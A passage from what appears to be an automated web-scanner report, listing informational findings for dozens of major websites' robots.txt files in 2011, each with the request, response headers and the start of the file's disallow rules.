Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 60
Date: Sat, 02 Apr 2011 14:06:04 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.ufc.com/sitemap
24.861. http://www.uhaul.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaul.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uhaul.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Oct 2010 15:09:06 GMT
Accept-Ranges: bytes
ETag: "5e1aaa953166cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=F9ECDBAF4FF89669DFCC93AF27D1A090; Path=/; Domain=.uhaul.com
Set-Cookie: TLTUID=F9ECDBAF4FF89669DFCC93AF27D1A090; Path=/; Domain=.uhaul.com; expires=Sat, 02-04-2021 13:57:30 GMT
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:29 GMT
Connection: close
Content-Length: 204

...User-agent: *
Disallow: /Admin/
Disallow: /Files/
Disallow: /TL/
Disallow: /UhaulNews/
Disallow: /publication.ashx
Disallow: /PubsHandler.ashx


Sitemap: http://www.uhaul.com/SitemapIndex.
...[SNIP]...
24.862. http://www.ultimate-guitar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ultimate-guitar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ultimate-guitar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:26 GMT
Content-Type: text/plain
Connection: close
Content-Length: 561
Last-Modified: Fri, 24 Dec 2010 08:30:45 GMT
Accept-Ranges: bytes

User-agent: *
Crawl-delay: 1
Disallow: /mailto.php
Disallow: /forum/showthread.php?p=
Disallow: /forum/showpost.php
Disallow: /forum/printthread.php?t=
Disallow: /vote4.php
Disallow: /report_ba
...[SNIP]...
24.863. http://www.umich.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.umich.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.umich.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:44 GMT
Server: Apache
Last-Modified: Thu, 23 Mar 2006 17:19:28 GMT
ETag: "123fa9-108-40facb5ef6800"
Accept-Ranges: bytes
Content-Length: 264
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /cgi-data
Disallow: /cgi-bin
Disallow: /~websvcs/
Disallow: /%7Ewebsvcs/
Disallow: /~homepage/
Disallow: /%7Ehomepage/
Disallow: /~smartgl/
Disallow: /%7Esmartgl/

Disallow: /~
...[SNIP]...
24.864. http://www.univision.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.univision.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.univision.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:54:19 GMT
Content-length: 1197
Content-type: text/plain
Last-modified: Tue, 28 Dec 2010 19:29:34 GMT
Connection: keep-alive

User-agent: Googlebot
Disallow: /buscar/
Disallow: /common/
Disallow: /content/viewAudioProduct.jhtml*
Disallow: /content/viewGraphicProduct.jhtml*
Disallow: /content/viewAudioProduct1.jhtml*
Disallow
...[SNIP]...
24.865. http://www.ups.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:16 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:05:11 GMT
Accept-Ranges: bytes
Content-Length: 166
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/preferred/lws_2.html
Disallow: /content/us/en/preferred/lws_1.html
Disallow: /content/us/en/preferred/lws_index.html
Allow: /

24.866. http://www.uptake.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uptake.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uptake.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 13:58:15 GMT
Content-Type: text/plain
Content-Length: 2697
Last-Modified: Fri, 08 Oct 2010 22:54:33 GMT
Connection: close
Expires: Mon, 02 May 2011 13:58:15 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /cms_admin
Disallow: /stylesheets
Disallow: /javascripts
Disallow: /embedded
Disallow: /redirect
Disallow: /search
Disallow: /reviews
Disallow: /static/popup.html
Disallow: /de
...[SNIP]...
24.867. http://www.urbanspoon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.urbanspoon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.urbanspoon.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:44:45 GMT
Content-Type: text/plain
Content-Length: 1295
Last-Modified: Wed, 21 Jul 2010 22:04:48 GMT
Connection: close
Expires: Sat, 02 Apr 2011 14:14:45 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes

User-agent: Googlebot
Disallow: /u/
Disallow: /m/u/
Disallow: /e/
Disallow: /s/
Disallow: /s?

User-agent: Googlebot-Mobile
Disallow: /u/
Disallow: /m/u/
Disallow: /e/
Disallow: /s/

User-agent: Media
...[SNIP]...
24.868. http://www.usa-people-search.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa-people-search.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usa-people-search.com

Response

HTTP/1.1 200 OK
Content-Length: 199
Content-Type: text/plain
Last-Modified: Thu, 30 Jul 2009 17:19:10 GMT
Accept-Ranges: bytes
ETag: "0bbe5d93911ca1:2ca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:55 GMT
Connection: close
Set-Cookie: iqf5cookie=369600704.20480.0000; path=/

User-agent: *
Disallow: /Order.aspx
Disallow: /order.aspx
Disallow: /Results.aspx
Disallow: /results.aspx
Crawl-delay: 3

User-agent: MediaPartners-Google
User-agent: Adsbot-Google
Disallow:
24.869. http://www.usajobs.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usajobs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usajobs.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 03 Aug 2010 11:00:02 GMT
Accept-Ranges: bytes
ETag: "c038e95fb32cb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 02 Apr 2011 13:35:33 GMT
Connection: close
Content-Length: 111

# Disallow all web spiders
User-agent: *
Disallow: /include/
Disallow: /scripts/
Disallow: /stylesheets/
   
24.870. http://www.usatoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 02 Apr 2011 13:32:43 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...
24.871. http://www.usbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usbank.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 05 Apr 2006 17:13:36 GMT
Accept-Ranges: bytes
ETag: "0602846d458c61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:32 GMT
Connection: close
Content-Length: 299

# Welcome to robots.txt on USBank.com -- sit down, relax, and have a cup of coffee while you look around. Have a nice day.
#
User-agent: *
Disallow: /js/
Disallow: /images/
Disallow: /test/
Disa
...[SNIP]...
24.872. http://www.use.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.use.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.use.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Thu, 27 Aug 2009 04:04:54 GMT
Accept-Ranges: bytes
Content-Length: 4606
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ads/
User-agent: Nutch
Disallow: /
User-agent: Jetbot/1.0
Disallow: /
User-agent: Jetbot
Disallow: /
User-agent: WebVac
Disallow: /
User-agent: naver
Disallow: /
User-agent: d
...[SNIP]...
24.873. http://www.usgs.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usgs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usgs.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:32 GMT
Last-Modified: Wed, 15 Sep 2010 20:15:09 GMT
Content-Type: text/plain
ETag: "383376c6-1d-49051fc732d41"
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Content-Length: 29
Connection: close

User-agent:*
Disallow: /faq/
24.874. http://www.usmagazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usmagazine.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.36
Content-Type: text/plain
Last-Modified: Thu, 22 Apr 2010 19:57:46 GMT
Content-Length: 305
X-Varnish: 2023612604
X-N: S
Date: Sat, 02 Apr 2011 13:26:43 GMT
Connection: close

#User-agent: Mediapartners-Google
#Disallow:
sitemap: http://www.usmagazine.com/sitemap.xml
User-agent: google-flipperbot
Disallow:
User-agent: *
Disallow: /services/adtestHome
Disallow: /services/adt
...[SNIP]...
24.875. http://www.usps.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usps.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usps.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Cteonnt-length: 712
Content-Type: text/plain
ETag: "18ee00fa-59-0-2c8"
Last-Modified: Wed, 11 Feb 2009 18:42:14 GMT
Cache-Control: no-cache, must-revalidate
Date: Sat, 02 Apr 2011 12:43:49 GMT
Content-Length: 712
Connection: close

User-agent: usps-gsa-crawler
Disallow: /it/

User-agent: *
Disallow: /access
Disallow: /atlanta
Disallow: /capdistrict
Disallow: /cgi-bin
Disallow: /cpim
Disallow: /cps
Disallow: /feedback
Disallow: /
...[SNIP]...
24.876. http://www.ussearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ussearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ussearch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:44 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 01:52:51 GMT
ETag: "287beb-e0-4906ad20022c0"
Accept-Ranges: bytes
Content-Length: 224
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#Update Robot.txt per Robert's new specifications
User-agent: *
Disallow: /consumer/commerce/property/
Disallow: /consumer/people-search/names/fl+gainesville/somkanya/das.html
Sitemap: http://www.u
...[SNIP]...
24.877. http://www.ustream.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ustream.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ustream.tv

Response

HTTP/1.0 200 OK
Server: Apache
Pragma: no-cache
X-RSRC: w18
Content-Length: 86
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=107
Expires: Sat, 02 Apr 2011 13:37:21 GMT
Date: Sat, 02 Apr 2011 13:35:34 GMT
Connection: close
X-N: S

User-agent: *
Allow: /
Disallow: /dunk/followers
Disallow: /SouljaBoyTellem/followers
24.878. http://www.utorrent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utorrent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.utorrent.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 14:14:12 GMT
Content-Type: text/plain
Content-Length: 112
Last-Modified: Sat, 05 Mar 2011 13:27:07 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /skins/vote/
Disallow: /skins/edit/
Disallow: /skins/create
Disallow: /skins/create/
24.879. http://www.va.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.va.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 29 May 2008 18:06:54 GMT
Accept-Ranges: bytes
ETag: "03396c6b6c1c81:0"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:33 GMT
Connection: close
Content-Length: 505
Set-Cookie: BIGipServerwww.va.gov_pool=1711384768.20480.0000; path=/
Set-Cookie: TSb10539=34a6d13d17a49ddaf12dbf6a8fd0ae3c3403a3c2bef2b6854d972535c2db820e29c468a6; Max-Age=900; Path=/

User-agent: *
Disallow: /cemetery/
Disallow: /med/osp/cgi-bin/
Disallow: /sec/
Disallow: /proj/va_sec_wg/
Disallow: /cgi-bin/
Disallow: /resdev/queri/members/
Disallow: /hyperfaq/
Disallow: /v
...[SNIP]...
24.880. http://www.vanguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vanguard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vanguard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:50 GMT
Content-length: 745
Content-type: text/plain
Last-modified: Thu, 11 Sep 2008 20:22:39 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: HNWPRD=C21;path=/;domain=.vanguard.com;

# robots.txt for http://www.vanguard.com/

User-agent: *
Disallow: /web/stylesheet/
Disallow: /web/images/
Disallow: /web/javascript/
Disallow: /images/
Disallow: /international/common/common.j
...[SNIP]...
24.881. http://www.vast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vast.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Set-Cookie: V_UID=2cd33a596c57dc387fe95f8a92027c32; expires=Fri, 23-Mar-2012 13:43:38 GMT; path=/
Set-Cookie: V_T=6a3bddf026b6bd17684837955b85baf7; expires=Sat, 02-Apr-2011 14:13:38 GMT; path=/
Set-Cookie: V_CHNL=KGRpcmVjdCk%3D; expires=Tue, 30-Mar-2021 13:43:38 GMT; path=/
Content-Length: 410
Date: Sat, 02 Apr 2011 13:43:38 GMT
Connection: close
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/plain;charset=UTF-8
Keep-Alive: timeout=15, max=50

User-agent: Googlebot
User-agent: MSNBot
User-agent: Teoma
User-agent: Slurp
Disallow: /resources
Disallow: /ajax
Disallow: /merix
Disallow: /graphs
Disallow: /rpc
Disallow: /details
Disallow: /detail
...[SNIP]...
24.882. http://www.veoh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.veoh.com

Response

HTTP/1.1 200 OK
Expires: Sat, 09 Apr 2011 13:34:15 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: veohCookie="VisitorUID=95AA1D01-B5B5-78C3-9E1D-74903F15C267&LastUpdate=02/Apr/2011:06:34:14 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:14 GMT; Path=/
Cache-Control: max-age=604800
Content-Length: 110
Date: Sat, 02 Apr 2011 13:34:15 GMT
Connection: close
Last-Modified: Mon, 13 Dec 2010 10:56:38 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
Keep-Alive: timeout=15, max=13

User-agent: *
Disallow: /veohSiteMap.xml
Disallow: /sitemap_index.xml
Disallow: /static/sitemaps/feeds/

24.883. http://www.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:35 GMT
Server: Apache
Set-Cookie: v1st=B13A8F3026123C3C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e934c-9eb-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 2539
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...
24.884. http://www.vh1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vh1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vh1.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 15 Feb 2010 19:35:48 GMT
ETag: "2f3219d-18b-47fa8b95dad00"
Accept-Ranges: bytes
Content-Length: 395
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:52:31 GMT
Connection: close

Sitemap: http://www.vh1.com/sitemap_index.jhtml
User-agent: *
Disallow: /interact/my_account
Disallow: /movies/browse
Disallow: /search/
Disallow: /video/search/
Disallow: /*?kw=vh1search2
Dis
...[SNIP]...
24.885. http://www.victoriassecret.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.victoriassecret.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.victoriassecret.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:44:24 GMT
ETag: "226-48c0a0ab46a00"
Accept-Ranges: bytes
Content-Length: 550
SID: 502
Content-Type: text/plain
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS UNI PUR NAV INT STA PRE OTC"
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:42:33 GMT
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /commerce/moreInfo.vs
Disallow: /search/
Disallow: /commerce/application?namespace=emailexclusive
Disallow: /CustomerService/
Disallow: /co
...[SNIP]...
24.886. http://www.videobash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videobash.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:09 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
Last-Modified: Fri, 09 Jul 2010 19:24:22 GMT
ETag: "51-4c377766"
Accept-Ranges: bytes
Content-Length: 81
Connection: close
Content-Type: text/plain
Set-Cookie: RNLBSERVERID=ded474; path=/
Cache-control: private

# robots.txt file for VideoBash

User-agent: *
Disallow: /video/player_related
24.887. http://www.videojug.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videojug.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 14:51:22 GMT
Accept-Ranges: bytes
ETag: "05150efe9eecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:57 GMT
Connection: close
Content-Length: 1613

User-agent: *
Disallow: /reportmessages
Disallow: /views/home/doubleclicktag.ashx
Disallow: /views/home/DownloadRedirect.ashx
Disallow: /neatupload/
Disallow: /signup
Disallow: /tag/*?*q=*
Disa
...[SNIP]...
24.888. http://www.videosurf.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videosurf.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:16 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Thu, 31 Mar 2011 08:10:34 GMT
Accept-Ranges: bytes
Content-Length: 190
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: */rss
Disallow: */rss/
Disallow: /xml/
Disallow: /api/
Disallow: /embed/*
Disallow: /video/*?t=
Disallow: /videos-at-a-glance*
Disallow: /surfs/*
Disallow: /webui/*

24.889. http://www.viewpoints.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viewpoints.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viewpoints.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 11 Jun 2010 02:38:13 GMT
ETag: "3a60e47-f37-488b807cbcf40"
Accept-Ranges: bytes
Content-Length: 3895
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the
# robots.txt file

User-agent: Googlebot
Disallow: /access/
Disallow: /admin/
Disallow: /categories/show/
Disallow:
...[SNIP]...
24.890. http://www.villagevoice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.villagevoice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.villagevoice.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d Zend Core/2.5.0 PHP/5.2.4
ETag: "37cacf-1af-4ea2c8c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/plain
Age: 60671
Date: Sat, 02 Apr 2011 14:19:06 GMT
Last-Modified: Mon, 31 Jan 2011 22:55:07 GMT
Content-Length: 431
Connection: close

# Internal GSA appliance
User-agent: gsa-crawler
Disallow:

User-agent: 008
Crawl-delay: 10
Disallow: /

# Everyone else
User-agent: *
Crawl-delay: 1
Disallow: /feedback/
Disallow: /readers/
Disallow:
...[SNIP]...
24.891. http://www.vimeo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vimeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:22 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 20:28:47 GMT
ETag: "3a0921-214-e842fdc0"
Accept-Ranges: bytes
Content-Length: 532
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 13:23:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.vimeo.com/sitemap.xml.gz

User-agent: Googlebot
Disallow: /log_in
Disallow: /sign_up
Disallow: /join
Disallow: /terms
Disallow: /privacy
Disallow: /download/
Allow: /

User-agent:
...[SNIP]...
24.892. http://www.virginia.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginia.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virginia.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:35 GMT
Server: Apache
P3P: policyref="http://www.virginiainteractive.org/w3c/p3p.xml", CP="NOI DSP COR CUR OUR NOR"
Last-Modified: Tue, 15 Jun 2010 18:41:16 GMT
ETag: "14aa1-ff-4c17c94c"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /vipnet/vipnet/
Disallow: /vipnet////
Disallow: /cmsarchive/
Disallow: /cmsportal2/cgi-bin/pw/
Disallow: /cmsportal3/cgi-bin/pw/
Disallow: /design/
Disallow: /cmsportal3/portal
...[SNIP]...
24.893. http://www.virginmobileusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginmobileusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virginmobileusa.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7d DAV/2 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
ETag: W/"177-1301421189000"
Last-Modified: Tue, 29 Mar 2011 17:53:09 GMT
Content-Type: text/plain
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:39:44 GMT
Date: Sat, 02 Apr 2011 13:39:44 GMT
Content-Length: 177
Connection: close

User-agent: *
Disallow: /legal/
Disallow: */phones/catalogPurchase.do
Disallow: /*jsessionid
Disallow: */Register01.jsp
Sitemap: http://www.virginmobileusa.com/sitemap.xml
24.894. http://www.vistaprint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vistaprint.com

Response

HTTP/1.0 200 OK
Content-Length: 899
Content-Type: text/plain
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=14182FC3CA56E854; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

User-agent: *
Disallow: /answer.aspx
Disallow: /vp/errjscript.aspx
Disallow: /vp/fnf.aspx
Disallow: /vp/iiserror.asp
Disallow: /vp/sno.asp
Disallow: /vp/sno.aspx
Disallow: /vp/ns/myppp.aspx
Di
...[SNIP]...
24.895. http://www.vitals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:10 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 14:40:04 GMT
ETag: "211-49fc844d61900"
Accept-Ranges: bytes
Content-Length: 529
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /v/
Disallow: /terms
Disallow: /terms/
Disallow: /physicians/
Disallow: /doctor/profile/
Disallow: /doctor/checkup/
Disallow: /doctor/checkup
Disallow: /doctor/search/
Disallow
...[SNIP]...
24.896. http://www.vrbo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vrbo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vrbo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:54:56 GMT
Accept-Ranges: bytes
